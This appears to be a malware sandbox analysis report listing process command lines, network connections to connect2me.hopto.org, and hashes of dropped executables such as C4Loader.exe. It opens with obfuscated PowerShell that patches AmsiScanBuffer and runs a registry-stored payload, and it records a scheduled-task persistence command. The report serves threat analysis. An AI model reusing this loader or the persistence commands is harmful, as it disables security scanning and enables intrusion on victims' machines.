+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+'g'+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+'o'+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+'tu'+[Char](97)+'l',$ZSHuKpULPU,$QkwglhEQDrqDnv).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'i'+[Char](109)+''+'e'+''+','+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $RDPsayfglCA.CreateType();}$bOBuOpyNTlZsS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+'a'+''+[Char](102)+''+[Char](101)+''+'b'+''+[Char](79)+'Bu'+'O'+''+[Char](112)+'y'+'N'+''+[Char](84)+''+[Char](108)+''+[Char](90)+'sS');$ZDMCDcEmYCAdGR=$bOBuOpyNTlZsS.GetMethod(''+[Char](90)+'D'+'M'+'CDcEmY'+[Char](67)+'A'+'d'+'G'+[Char](82)+'',[Reflection.BindingFlags]''+[Char](80)+''+'u'+'bl'+'i'+''+'c'+','+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$eNdQgcekoSBUmRFPsVw=MRBJKUEqLqZF @([String])([IntPtr]);$TZOfvmLjZYgmrIKLGacgpo=MRBJKUEqLqZF @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hgoBOcICbql=$bOBuOpyNTlZsS.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+'dul'+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('ke'+[Char](114)+''+[Char](110)+''+[Char](101)+'l32'+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$yPbPIMZNLHtwWW=$ZDMCDcEmYCAdGR.Invoke($Null,@([Object]$hgoBOcICbql,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+[Char](100)+'Li'+[Char](98)+''+'r'+''+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$SwQtVGMHIifJqJbDf=$ZDMCDcEmYCAdGR.Invoke($Null,@([Object]$hgoBOcICbql,[Object](''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+[Char](97)+'l'+'P'+'ro'+'t'+''+'e'+'c'+[Char](116)+'')));$iQLqRAa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yPbPIMZNLHtwWW,$eNdQgcekoSBUmRFPsVw).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'');$IexepoiJtdzDAoXcC=$ZDMCDcEmYCAdGR.Invoke($Null,@([Object]$iQLqRAa,[Object]('A'+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+'n'+'B'+'u'+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$pJekaZLEia=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SwQtVGMHIifJqJbDf,$TZOfvmLjZYgmrIKLGacgpo).Invoke($IexepoiJtdzDAoXcC,[uint32]8,4,[ref]$pJekaZLEia);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$IexepoiJtdzDAoXcC,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SwQtVGMHIifJqJbDf,$TZOfvmLjZYgmrIKLGacgpo).Invoke($IexepoiJtdzDAoXcC,[uint32]8,0x20,[ref]$pJekaZLEia);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+'i'+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{6f7e2f7e-3b62-4443-8c25-ff0d1958576f}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 560 -p 3288 -ip 3288
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3288 -s 756
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 624 -p 4416 -ip 4416
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4416 -s 844
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 624 -p 2736 -ip 2736
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2736 -s 708
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 93.184.220.29:80 | tcp | |
| N/A | 8.8.8.8:53 | connect2me.hopto.org | udp |
| N/A | 37.139.129.113:443 | connect2me.hopto.org | tcp |
| N/A | 107.182.129.73:21733 | tcp | |
| N/A | 40.79.189.58:443 | tcp | |
| N/A | 93.184.221.240:80 | tcp | |
| N/A | 93.184.221.240:80 | tcp | |
| N/A | 93.184.221.240:80 | tcp |
Files
memory/4832-132-0x0000000000000000-mapping.dmp
memory/4832-133-0x0000000000400000-0x0000000000405000-memory.dmp
memory/4832-139-0x0000000000400000-0x0000000000405000-memory.dmp
memory/3844-140-0x0000000000000000-mapping.dmp
memory/3844-141-0x0000000002840000-0x0000000002876000-memory.dmp
memory/3844-142-0x0000000004F60000-0x0000000005588000-memory.dmp
memory/3844-143-0x0000000004E40000-0x0000000004E62000-memory.dmp
memory/3844-144-0x0000000005740000-0x00000000057A6000-memory.dmp
memory/3844-145-0x00000000057B0000-0x0000000005816000-memory.dmp
memory/3844-146-0x0000000005E10000-0x0000000005E2E000-memory.dmp
memory/3844-147-0x0000000006FF0000-0x0000000007022000-memory.dmp
memory/3844-148-0x0000000074130000-0x000000007417C000-memory.dmp
memory/3844-149-0x00000000063D0000-0x00000000063EE000-memory.dmp
memory/3844-150-0x0000000007780000-0x0000000007DFA000-memory.dmp
memory/3844-151-0x0000000007130000-0x000000000714A000-memory.dmp
memory/3844-152-0x00000000071C0000-0x00000000071CA000-memory.dmp
memory/3844-153-0x0000000007400000-0x0000000007496000-memory.dmp
memory/3844-154-0x0000000007370000-0x000000000737E000-memory.dmp
memory/3844-155-0x00000000073C0000-0x00000000073DA000-memory.dmp
memory/3844-156-0x00000000073B0000-0x00000000073B8000-memory.dmp
memory/3844-157-0x00000000074D0000-0x00000000074F2000-memory.dmp
memory/3844-158-0x00000000083B0000-0x0000000008954000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
memory/1452-159-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
memory/3644-162-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 3753f9966e5b4fdc87184c1749f2bd25 |
| SHA1 | 69b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756 |
| SHA256 | 0f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299 |
| SHA512 | 3283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6 |
memory/1452-164-0x00000000008F0000-0x0000000000A5C000-memory.dmp
memory/1452-165-0x00000000052D0000-0x0000000005362000-memory.dmp
memory/4144-166-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
C:\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 3753f9966e5b4fdc87184c1749f2bd25 |
| SHA1 | 69b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756 |
| SHA256 | 0f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299 |
| SHA512 | 3283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6 |
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/5076-170-0x0000000000000000-mapping.dmp
memory/5080-171-0x0000000000000000-mapping.dmp
memory/5080-174-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
memory/1452-172-0x0000000005810000-0x000000000581A000-memory.dmp
memory/5080-179-0x0000000005F20000-0x0000000006538000-memory.dmp
memory/5080-180-0x00000000059C0000-0x00000000059D2000-memory.dmp
memory/5080-181-0x0000000005AF0000-0x0000000005BFA000-memory.dmp
memory/5080-182-0x0000000005A20000-0x0000000005A5C000-memory.dmp
memory/4144-183-0x00000000021F0000-0x00000000026F4000-memory.dmp
memory/5080-184-0x0000000005D90000-0x0000000005E06000-memory.dmp
memory/4144-185-0x0000000002701000-0x000000000283E000-memory.dmp
memory/5080-186-0x0000000005EF0000-0x0000000005F0E000-memory.dmp
memory/5080-187-0x0000000007460000-0x00000000074B0000-memory.dmp
memory/5080-188-0x0000000007680000-0x0000000007842000-memory.dmp
memory/5080-189-0x0000000007D80000-0x00000000082AC000-memory.dmp
memory/4144-190-0x00000000021F0000-0x00000000026F4000-memory.dmp
memory/3600-191-0x00000224E0A60000-0x00000224E0A82000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e10ec5d92c875fce938a12dc14ec6e02 |
| SHA1 | a20164371c24f09d05208a691479c3665056ea82 |
| SHA256 | dddd2b37d319c15225ef7cc88d71293af52db60941b2b2490de0d7cd3c71ba52 |
| SHA512 | 5cc7fb9adc206e899b3fee2eb1d24ca334fafcc4d07c7578d9603fa65285372e4a8f4aed62a2d67f413725c14d2f0fe4730d356c595591ce68bf2a707a6c0b21 |
memory/3600-193-0x00007FFA93000000-0x00007FFA93AC1000-memory.dmp
memory/3600-194-0x00007FFA93000000-0x00007FFA93AC1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/1772-196-0x00007FFA93000000-0x00007FFA93AC1000-memory.dmp
memory/3932-198-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a7ce8cefc3f798abe5abd683d0ef26dd |
| SHA1 | b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e |
| SHA256 | 5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a |
| SHA512 | c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64 |
memory/4952-199-0x0000000000000000-mapping.dmp
memory/404-200-0x0000000000000000-mapping.dmp
memory/4916-201-0x0000000000000000-mapping.dmp
memory/2664-202-0x0000000000000000-mapping.dmp
memory/3476-203-0x0000000000000000-mapping.dmp
memory/3920-204-0x0000000000000000-mapping.dmp
memory/2200-205-0x0000000000000000-mapping.dmp
memory/1380-206-0x0000000000000000-mapping.dmp
memory/3208-207-0x0000000000000000-mapping.dmp
memory/4144-208-0x0000000002701000-0x000000000283E000-memory.dmp
memory/1772-209-0x00007FFA93000000-0x00007FFA93AC1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
memory/4080-211-0x00007FF6DF2E1938-mapping.dmp
memory/4408-212-0x00007FFA940F0000-0x00007FFA94BB1000-memory.dmp
memory/4408-213-0x00007FFAB2090000-0x00007FFAB2285000-memory.dmp
memory/4408-214-0x00007FFAB03D0000-0x00007FFAB048E000-memory.dmp
memory/2644-215-0x0000000140000000-0x0000000140029000-memory.dmp
memory/2644-216-0x0000000140002314-mapping.dmp
memory/2644-218-0x0000000140000000-0x0000000140029000-memory.dmp
memory/2644-219-0x00007FFAB2090000-0x00007FFAB2285000-memory.dmp
memory/2644-220-0x00007FFAB03D0000-0x00007FFAB048E000-memory.dmp
memory/392-222-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/624-221-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/3444-265-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/3200-272-0x0000000000000000-mapping.dmp
memory/4408-281-0x00007FFAB03D0000-0x00007FFAB048E000-memory.dmp
memory/3240-285-0x0000000000000000-mapping.dmp
memory/2644-286-0x00007FFAB2090000-0x00007FFAB2285000-memory.dmp
memory/676-289-0x00000226A71A0000-0x00000226A71C7000-memory.dmp
memory/960-291-0x00000244741B0000-0x00000244741D7000-memory.dmp
memory/496-294-0x000001BA6FF60000-0x000001BA6FF87000-memory.dmp
memory/3240-293-0x0000029CA40C0000-0x0000029CA40E7000-memory.dmp
memory/3240-290-0x0000029CA4090000-0x0000029CA40B7000-memory.dmp
memory/392-292-0x00000252384C0000-0x00000252384E7000-memory.dmp
memory/3200-288-0x00000206EEAE0000-0x00000206EEB07000-memory.dmp
memory/624-287-0x000001ADE6980000-0x000001ADE69A7000-memory.dmp
memory/2644-284-0x0000000140000000-0x0000000140029000-memory.dmp
memory/4408-269-0x00007FFAB2090000-0x00007FFAB2285000-memory.dmp
memory/3080-264-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/900-263-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/2768-262-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/2620-261-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/5032-298-0x0000000000000000-mapping.dmp
memory/1028-299-0x0000012B96320000-0x0000012B96347000-memory.dmp
memory/1120-300-0x0000022DBFD40000-0x0000022DBFD67000-memory.dmp
memory/864-296-0x0000017920AB0000-0x0000017920AD7000-memory.dmp
memory/724-297-0x000001E25C6F0000-0x000001E25C717000-memory.dmp
memory/2544-260-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/2520-259-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/2512-258-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/2484-256-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/2432-255-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/2404-254-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/2356-253-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/2348-252-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/2132-251-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/2080-250-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/1600-249-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/2008-248-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/1968-247-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/1920-246-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/1880-245-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/1868-244-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/1800-243-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/1760-242-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/1648-241-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/1616-240-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/1572-239-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/1560-238-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/1460-237-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/1400-236-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/3060-303-0x0000000000000000-mapping.dmp
memory/1248-304-0x000001761BA70000-0x000001761BA97000-memory.dmp
memory/1160-302-0x000002B59DD40000-0x000002B59DD67000-memory.dmp
memory/1292-305-0x00000186D97B0000-0x00000186D97D7000-memory.dmp
memory/1348-306-0x000001F3A8D30000-0x000001F3A8D57000-memory.dmp
memory/1356-235-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/4408-307-0x00007FFA940F0000-0x00007FFA94BB1000-memory.dmp
memory/1348-234-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/1356-308-0x000002ACACE40000-0x000002ACACE67000-memory.dmp
memory/1400-309-0x00000197055D0000-0x00000197055F7000-memory.dmp
memory/1292-233-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/1248-232-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/1160-231-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/1120-230-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/1028-229-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/724-228-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/864-227-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/624-226-0x000001ADE6950000-0x000001ADE6971000-memory.dmp
memory/960-225-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/3704-266-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/2504-257-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/676-223-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
memory/496-224-0x00007FFA72110000-0x00007FFA72120000-memory.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5CAB.tmp.csv
| MD5 | cc6561fa6a6f7d58544ca44f54c639ac |
| SHA1 | 0a3cf9a8b7a84334939c072dc97a85fc58228ea8 |
| SHA256 | e60454d29cb335765e01fc810392fa2e2056619814d6a6ff630401e3a5f4771d |
| SHA512 | 78dcc5da888b86dc8199059b1d95f5c3ca84281ea7b31bbde4e541f5b326e3bd960efdb8697dc5c3a38dda73669447cffe37564aca1012454576cd81218c63ad |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D09.tmp.txt
| MD5 | ce94aa87c87e8b64c8b549ac97404e30 |
| SHA1 | 705de983ed8c373ed87c727deb21f02f8fcc65bb |
| SHA256 | 805f36c14f250c3e3790d8cfcdb0190825c7555353ad1c7835e9803cb950bd10 |
| SHA512 | 793b44f2df6075d703952f0cea5939c57fd2db320e88b5fb7762c4784d85de4ac7ccf39313fb4d29d33a88f9fd7a86b4d4c137a9bb4cbc61b1568cfce35a03d9 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D87.tmp.csv
| MD5 | 00e9515af33ff80457e5bdae729c44fc |
| SHA1 | 698f4fb59c7183bd860c8a4c26009774c708e50e |
| SHA256 | 6f96b9865282635e7c150c9a723ce798309f731c3c73fe73ae5e1bf27423db5e |
| SHA512 | 27d1b3dc263533858466490e5ee028d7a1bd4eff38d2f50c0a0a92319e7312bba544b6febccaada9250dea016aedb1d20fe8de4011cc1474334553c24842cca1 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DF6.tmp.txt
| MD5 | 6cd5b05525cd8ffc782b293cc8997ba6 |
| SHA1 | f4059ab06856578f6f95a589cbca35445000e06a |
| SHA256 | 632690922794c190691129d1a33beb50697f9a9d483e80300c8017317b4f3ecf |
| SHA512 | 19049d5773a7258436b33a3225c0449be77d71b7e9b845d8c7969084916a09531607973ba756840b048dceeeeb68f0f621850a515b4c1ad59e902a7133d75869 |
memory/3724-369-0x0000000000000000-mapping.dmp
memory/4748-373-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/4252-380-0x0000000000000000-mapping.dmp
memory/2392-389-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFFF3.tmp.csv
| MD5 | b3301020005ece2d6042f823b52c8895 |
| SHA1 | 1c168c7d7b0602d61175f5bd204092a18f0324fb |
| SHA256 | 052017f250e3fce9d959e037da7c2435094bd8e7c934df15ff566b7d872f1364 |
| SHA512 | c61c55582575b63d49b956407e301510448b3baf94da1c0b2f45d7622695f041214c771b7885491c5e2915447eab8d9e5f8548725430eb4dd41548bc481fffba |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER52.tmp.txt
| MD5 | d62ec8f4b7a204351ca001529b054694 |
| SHA1 | 31ebf7723f66ca8d1481af9ff5ac7b07fafe3e07 |
| SHA256 | 41cac067e18308a1c2a8930e7bd35d4637433e7d63738d4c5683a12df135f712 |
| SHA512 | 8a71a043a3618946286f72cff5c4a172ec2a199e63b743dcb66f7b5db0c0a70aa864e459a88d0651eefd227953938841502cda8aeed79674d34890e4b6030bc9 |
memory/404-401-0x0000000000000000-mapping.dmp